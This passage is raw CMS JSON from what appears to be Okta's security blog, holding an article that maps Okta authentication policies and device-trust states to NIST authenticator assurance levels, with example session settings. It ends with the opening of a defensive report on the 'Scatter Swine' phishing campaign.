Authentication.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/platform/devices/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (sometimes called Device Context) assesses whether the device used for an authentication request is known, registered, managed or exhibiting a strong security posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unregistered\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A device/browser that is not registered with Okta Verify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Registered/Unmanaged\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": A device that is registered with the Okta Verify application to provide administrators with better visibility (OS, Device Type, Serial Number, etc.)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=UERaxr743gk\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Assurance\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": Does the device meet certain security requirements? (OS version? Jailbroken? Encrypted? Screen lock configured?)\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Managed\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": A registered device enrolled in a unified endpoint management (UEM) solution. This could be with a certificate and a SCEP profile for workstations (Windows/MacOS) or an application secret for mobile devices (Android, iOS)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Managed + EDR\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (sometimes called Secured): A managed workstation (Windows/MacOS) that is checked for a device \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-available-signals.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"posture score\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via an EDR solution (CrowdStrike orWindows Security Center)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Device Assurance, Managed Device checks and Device Posture checks all require an org to be licensed for Adaptive Multifactor Authentication.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Risk, Sensitivity and Impact\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The final piece to this puzzle is to determine the sensitivity and impact of the application and its stored data. This exercise is somewhat subjective and may require involvement from risk and compliance teams. Some considerations to take into account when classifying apps are: production vs test, regulatory compliance (SOX, PCI-DSS, HIPAA, etc.), and personally identifiable information (PII). We recommend reviewing the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST 800-30\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"(.pdf) or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.199.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIPS 199\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"(.pdf) standards for additional guidance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Low Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Everyday apps that do not contain sensitive data. Examples could be video conferencing, helpdesk, educational applications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Apps that may contain some sensitive information or proprietary information. e.g. Communications, collaborations, sales and marketing applications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"High Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Apps that provide access to very sensitive or proprietary information. (PII? SOX? Production? Apps with HR, healthcare or financial data?) Anything that would be extremely damaging to the company or customer if access was compromised.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once all of these conditions have been taken into consideration, organizations will be able to apply the right levels of assurance to meet their desired outcome. One way to accomplish this would be to align closely to the NIST \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3-Implementation-Resources/63B/AAL/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticator Assurance Levels (AAL)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". While there can be some ambiguity around what specific authenticators meet each of the NIST requirements, we believe it is a great framework to start with. In the example below, we have set out our interpretation of how Okta policies and authenticators could align with the NIST AAL framework.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Example Interpretation of NIST’s Authenticator Assurance Levels (AAL)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 1 (Low) - Verify using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"one or more factors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This could be any factor “something you have (Okta Verify, security key, etc.)”, “something you know (password/secrets)”, or “something you are” (WebAuthn/FIDO2-capable biometric checks like face or fingerprint matching)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 30 days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL1\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 2 (Medium) - Verify using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"two distinct factors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This needs to contain two authentication factors, either (1) a physical authenticator and a memorized secret, or (2) a physical authenticator and biometrics linked to that authenticator\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An example would be a password + Okta Verify OTP or password + Okta Verify FastPass with Biometric\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 12 hours and idle session time to 30 minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL2\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 3 (High) - Verify using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"multiple factors, phishing resistance and proof of possession of a hardware-based key\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of June 2024, Okta FastPass with user verification using biometrics or PIN can be used to satisfy NIST AAL3 requirements \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Other options to satisfy AAL3 include a FIPS device-bound passkey and CAC-PIV Authentication. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 12 hours and idle session time to 15 minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL3\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Idle Session time is configured at the Global Session Policy level. Session lifetime and idle time applies to first party Okta apps (i.e Okta Dashboard, Okta Admin Console etc.). The majority of third party apps require a session lifetime and idle time specified within each respective application.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bringing it all together\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The final step is to configure access policies that balance user convenience and security. With Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-app-sign-on-policies.htm?cshid=ext-about-asop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"sharable application authentication policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", administrators have the ability to create differentiated access policies for every combination of contextual access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a reference table – for illustrative purposes only – that we have used with customers to inform their approach to creating authentication policies in OIE. Much like determining the sensitivity of an app, this exercise is highly subjective and the table should be populated according to your organization’s risk tolerance. We've added detailed screenshots of authentication policies and rules in the appendix to further illustrate.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2gTFFt8la9BVCviR1De3Xz\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using the approach taken in this example, a user attempting to access a relatively low sensitivity resource, from a device that has recorded a strong security posture and exhibiting known or trusted patterns of behavior (presenting lower authentication risk), should be subject to less friction to verify their identity. If the application is highly sensitive, the reverse applies - the strongest authenticator factors should be required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of how the table above would play out in a real world situation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scenario 1:\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Doe wants to learn a new skill through a course from Udemy that’s offered through his company. (Udemy is classified as low impact by his company)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome A - With a corporate-owned device, he’ll be able to access this application from a trusted location without having to enter in his username/password/MFA again. This provides a seamless login experience while trusting that the user is who they say they are.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome B - With a personal Okta-registered device, John can still access the application as long as he provides two factors of authentication (e.g. password + Okta Verify).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scenario 2:\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Jane Doe needs to access the AWS console to deploy a new application (AWS is classified as high impact by her company)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome A - With a corporate owned device, she'll be able to access it only after she has provided a phishing resistant authenticator like Okta Verify FastPass or FIDO2/WebAuthn (face or fingerprint matching, physical security key)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome B - With a personal Okta-registered device, Jane will be denied access to AWS.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a perfect world, every access attempt would be challenged with the highest level of authentication assurance. But in reality, that is not always possible. For example, some devices and applications do not have the necessary capabilities to support the highest levels of authentication and other authenticators may be required during enrollment or recovery flows.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is why it is vital to develop Levels of Assurance for your organization, so that each of the different access requirements can be properly addressed. By leveraging Okta Authentication Policies, your organization can take a contextual approach to identity and access management that harmonizes end user experience and security assurance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Appendix\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Authenticator Assurance Levels are primarily enforced by the Authentication Policies, but the Global session policy is also required to specify Idle Session time. Below is an example of a configuration for the Global Session Policy to help address Okta Authenticator Assurance Level 2:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-okta-sign-on-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create a Global Session policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the everyone group and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/add-okta-sign-on-policy-rule.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create a new rule\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keep \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Policy settings\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" section to default selections\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Establish the user session with Any factor used\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is set to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"meet the Authentication Policy requirements\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Multi Factor Authentication (MFA)\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is set to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"“Not Required”\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (Authentication Policies will define this setting)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Maximum Okta session lifetime\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"12 hours\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (based on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST SP800-63-3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - this minimizes the risk of session cookies misuse or hijacking)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Expire session after user has been idle on Okta for\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"30 minutes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (based on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST SP800-63-3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - this minimizes the risk of session cookies misuse or hijacking)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Persist session cookies across browser sessions\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disable\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The re-authentication frequency can also be specified at the Authentication Policy level and should be set in accordance to the sensitivity/impact of the application being accessed. An example could be **every time ** for a high impact app and **never ** for a low impact app.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is an example of what an Authentication Policy that satisfies Okta Authenticator Assurance Level 2 (Medium) could look like. In this example multiple factors are required, users need to be on a managed device, EDR signals need to be met, device assurance requirements must be met, and phishing resistance is enforced. If all of these requirements are not met, then the user is denied access to the resource.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1p2sLCb2YpDUZtX2x0upoP\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2D5NEXcleKmY5U3YT0yrXF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3irTPbIkaW8EF0Xtng46uU\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 15, 2023: Edited AAL3 requirements to include FastPass with biometrics or PIN.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-08-16T03:06:37.495Z","secAuthor":[{"id":"03d116d2-8ede-584a-94b4-46d34376310d","bio":{"bio":"As a Solutions Engineer at Okta, Josh works closely with customers to identify challenges around identity and then craft solutions catered to the customer's business objectives. Prior to Okta, Josh worked as a Sales Engineer at Citrix where he focused on virtualization and SASE deployments. Josh has a B.S. in Chemical and Biochemical Engineering from the Colorado School of Mines and currently resides in Denver, Colorado where he enjoys skiing, climbing, hiking, and playing soccer.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1sb8LvgfuUTcjyGeLDBiSr/919e0a73cff1ba70de2640cf63780d46/josh-clark.png"},"name":"Josh Clark","jobTitle":"Solutions Engineer","slug":"josh-clark","node_locale":"en"},{"id":"b57368d9-674a-5b5a-9d24-f0ec0cca114e","bio":{"bio":"Tin Nguyen manages a team of Solutions Engineers at Okta to help solve the many identity challenges that organizations face today. Before joining Okta, he spent years leading Identity and Security engagements at a consulting firm with an ultimate mission of enabling everyone to safely, seamlessly, and reliably use any technology.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5yGqdlJB5WlusmatIEjk7j/9ead79343e0e49b54215747bcfa0b8ae/tin-nguyen.png"},"name":"Tin Nguyen","jobTitle":"Solutions Engineering Manager","slug":"tin-nguyen","node_locale":"en"}]},{"slug":"/scatterswine","id":"45d94fc0-5af8-563f-98ea-99edadcf307b","title":"Detecting Scatter Swine: Insights into a Relentless Phishing Campaign ","date":"2022-08-25T11:49:59+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Twilio recently identified unauthorized access to information related to 163 Twilio customers, including Okta. Access was gained to internal Twilio systems, where data of some Okta customers was accessible to a threat actor (detailed below).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has determined that a small number of 1) Mobile phone numbers and 2) Associated SMS messages containing one-time passwords (“OTPs”) were accessible to the threat actor via the Twilio console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has notified any customers where a phone number was visible in the console at the time the console was accessed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no actions necessary for customers at this time. Details regarding this access, our response, and best practices can be found below.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, a number of technology companies were subject to persistent phishing campaigns by a threat actor we refer to as “Scatter Swine”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Defensive Cyber Operations (DCO) has proactively notified these companies when we have observed phishing infrastructure deployed by this threat actor, among others. It is commonplace for DCO to detect Scatter Swine repeatedly targeting the same organizations with multiple phishing sites within a matter of 